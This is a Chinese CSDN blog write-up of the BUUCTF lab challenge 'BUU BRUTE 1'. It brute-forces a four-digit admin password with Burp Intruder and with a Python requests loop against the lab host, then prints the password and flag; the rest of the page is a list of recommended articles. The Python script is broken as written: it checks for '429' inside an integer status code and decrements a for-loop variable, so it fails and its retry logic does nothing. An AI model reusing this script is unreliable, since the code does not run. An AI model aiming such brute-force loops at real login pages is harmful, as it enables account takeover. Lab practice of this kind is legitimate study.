BUU BRUTE 1

最新推荐文章于 2024-04-26 22:03:48 发布

有搞头-CC

最新推荐文章于 2024-04-26 22:03:48 发布

阅读量354

点赞数 9

分类专栏： BUUCTF 文章标签： web安全安全安全性测试前端

本文链接：https://blog.csdn.net/weixin_46601305/article/details/135811823

版权

BUUCTF 专栏收录该内容

16 篇文章 0 订阅

订阅专栏

靶场教程

1.开局页面，是个登录界面。

2.尝试万能密码，发现并不可行，提示【用户名错误】。用户名输入admin，发现提示密码错误，为四位数字。

3.那么，抓包爆破吧。通过burp进行抓包。

4.发送包到 Intruder 进行爆破。快捷键 Ctrl + L

3.设置爆破数值，进行爆破。在 3 处修改爆破数值0，9999，1即可。【注：已知爆破密码6490，可自定义缩小爆破范围测试】

4.开始爆破，发现结果。【密码：6490】

5.获得flag

账号：admin
密码：6490
flag{b3e478ac-0cc9-4674-b309-3beffb36009a}

方案二

1.通过 python 脚本，获取密码。

import time
import requests

url="http://f6e13443-89ab-43b2-b355-7efe8190c675.node5.buuoj.cn:81/?username=admin&password="

for i in range(6400, 7000):
    res = requests.get(url + str(i))
    print("[*] Try :" + str(i))
    if "429" in res.status_code:
        time.sleep(0.5)
        i = i-1
        continue
    if res.text != "密码错误，为四位数字。":
        print(res.text)
        break

2.获取 flag

账号：admin
密码：6490
flag{b3e478ac-0cc9-4674-b309-3beffb36009a}

优惠劵

有搞头-CC

关注关注

9
点赞
踩
7

收藏

觉得还不错? 一键收藏
0
评论
BUU BRUTE 1

BUUCTF 靶场 BUU BRUTE 1
复制链接

扫一扫

专栏目录

Burpsuite神器使用介绍

07-07

burpsuite神器使用详细介绍，让你从小白进入大神。

buuctf-BUU BRUTE 1

cdcdcdcd123132的博客

02-13

588

BUUCTF在线评测 (buuoj.cn)随便输入测试发现可以爆破出用户名。一个登录页面猜测需要爆破。用户名确定后爆破密码。

参与评论您还未登录，请先登录后发表或查看评论

BUU BRUTE 1 优化解决方式

qq_40432713的博客

01-19

5833

题目 BUU BRUTE 1 简单fuzz后可知是一个四位密码的爆破，brupsuite或者脚本都可以解决。网上有很多简单的教学。但是该题有一个问题就是会报429请求过多的错误。使用brupsuite线程开高了会触发报错，导致错过很多测试，线程开低的话速度又很慢。脚本的话速度就快很多了。参考了一下别人的脚本，但是他并没有处理429错误，于是这里改进一下： import time import requests url="http://23b71b6s-f202-4f59-9ab1-q19fcv1cda9

BUU-Basic-BUU BRUTE 1

七堇年的博客

01-20

1484

BUU-Basic-BUU BRUTE 1

BUUCTF -＞ Basic -＞ BUU BRUTE 1

m0_74940843的博客

09-24

263

找到返回长度异于其它payload的请求(在此实例中即为admin)，响应页面。同样是找到长度不一样的，还是挺慢的，一个一个找好累呀。随便输入一个用户名和密码，用burp抓取数据包。在payload板块添加字典。发送到intruder。所以我们获得了两个信息。密码错误，为四位数字。

BUU 论坛的编辑器163Editor

09-21

BUU 论坛的编辑器DianUbb.rar

ssi经验总结

04-09

ssi经验总结

Majin Buu Top HD Anime New Tabs Theme-crx插件

03-15

每次打开一个新选项卡，您将获得Majin Buu提供的不同高清壁纸这个新主题包括时钟等等。魔鬼的布欧（the devil，Buu），日本动漫《七龙珠》中的义与恶的角色，是《七龙珠》综合实力最强的BOSS。这个名字来自电影...

POSN:POSN-BUU的源代码

04-01

POSN POSN-BUU的源代码

【网络安全】安全事件管理处置 — 安全事件处置思路指导

最新发布

享你所想

04-26

480

一、处理DDOS事件 1.准备工作 2.预防工作 3.检测与分析 4.限制、消除 5.证据收集二、处理恶意代码事件 1.准备 2.预防 3.检测与分析 4.限制 5.证据收集 6.消除与恢复三、处理未授权访问事件 1.准备 2.预防 3.检测与分析 4.限制、消除 5.证据收集 6.恢复四、处理复合型安全事件 1.建议

从内部防护汽车网络安全——硬件安全模块(HSM)保护ECU主处理器内部

dianqicyuyan的博客

04-23

249

HSM是一种硬件，它以物理方式封装了安全功能。其集成芯片专为IT安全应用而设计，通常具有自己的处理器核心、各种内存（RAM、ROM、闪存等）和硬件密码加速器。此外，HSM必须满足用于车辆应用的特定标准，并且极其有效的集成对于降低成本至关重要。其主要要求包括ECU应用程序和HSM之间的安全接口，以及用于分析故障的调试/测试接口。HSM必须能够以尽可能短的等待时间处理加密信息，并能够承受汽车环境中的标准温度。从根本上说，HSM通过其自己的处理器核心来执行汽车应用场景所需的所有IT安全功能。

网络安全数字孪生：一种新颖的汽车软件解决方案

经纬恒润的官方博客

04-22

813

经纬恒润作为Cybellum在中国的代理商，旨在借助产品安全平台以及服务，提供汽车信息安全解决方案，帮助国内汽车OEM及其供应商能够在汽车软件开发全生命周期内大规模评估和降低安全风险，保证产品安全。

网络安全（黑客）—2024自学

dexi1113的博客

04-16

1706

我在这里可以很肯定地告诉你："网络安全有很好的发展前景，前沿网络安全技术即将崛起，或者说已经崛起"。

【网络安全】常见的网路安全设备及功能作用总结

白帽黑客八哥的博客

04-22

319

一种整合多种安全功能（如防火墙、防病毒、内容过滤等）于一体的网络安全设备。

网络安全（黑客技术）—2024自学

TDJYGC的博客

04-17

1430

网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的，技术上面其实有很大的重叠性，抛开甲乙方、岗位名称、岗位职责等因素来看，作为学技术的，也根据以往我们给学员推荐就业和入职情况来看，只要好好掌握以下几种技术（网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言）中的2到3个，都可以较好的胜任工作需求。

网络安全之SQL注入及防御（下篇）

weixin_70911257的博客

04-23

1158

sql注入waf绕过

【网络安全】HTTP协议 — 特点

享你所想

04-23

840

【问题】为什么登录一个某些网站后，间隔一段时间，网站还是知道我们是谁呢？方法是为了告知服务器，该请求的意图是什么，向服务器所请求的资源下达命令。Http协议规定，请求从客户端发起，由服务端来响应该请求并返回。2）持久连接（HTTP keep alive)有问题可私聊：QQ：3375119339。1.URI（统一资源标识符）1）持久连接要解决的问题。五、持久连接&管线技术。1.不保存状态的协议。六、cookie技术。

网络安全实训Day16

Yisitelz的博客

04-26

201

网络空间安全第16天学习笔记。漏洞扫描；内网渗透

BUU reverse 1

08-22

BU reverse 1是一个反向工程题目。我们需要使用IDA来分析给定的程序并找到正确的flag。根据引用，我们可以使用strncmp函数来比较两个字符串的前几位。如果相同，返回0；如果不同，返回正数或负数。根据引用，我们可以得知，正确的flag应该与字符串"this is the right flag!"相同。因此，我们需要在IDA中查看字符串并找到正确的flag。然后，我们可以按照引用中的步骤来进行操作，将ASCII码转为字符。通过这些步骤，我们可以找到正确的flag。123 #### 引用[.reference_title] - *1* *3* [buuctf 逆向刷题01——reverse1](https://blog.csdn.net/qq_42642222/article/details/127678168)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [BUUCTF--Reverse--easyre，reverse1，新年快乐(面向新手，超详细)](https://blog.csdn.net/qq_65165505/article/details/130263889)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交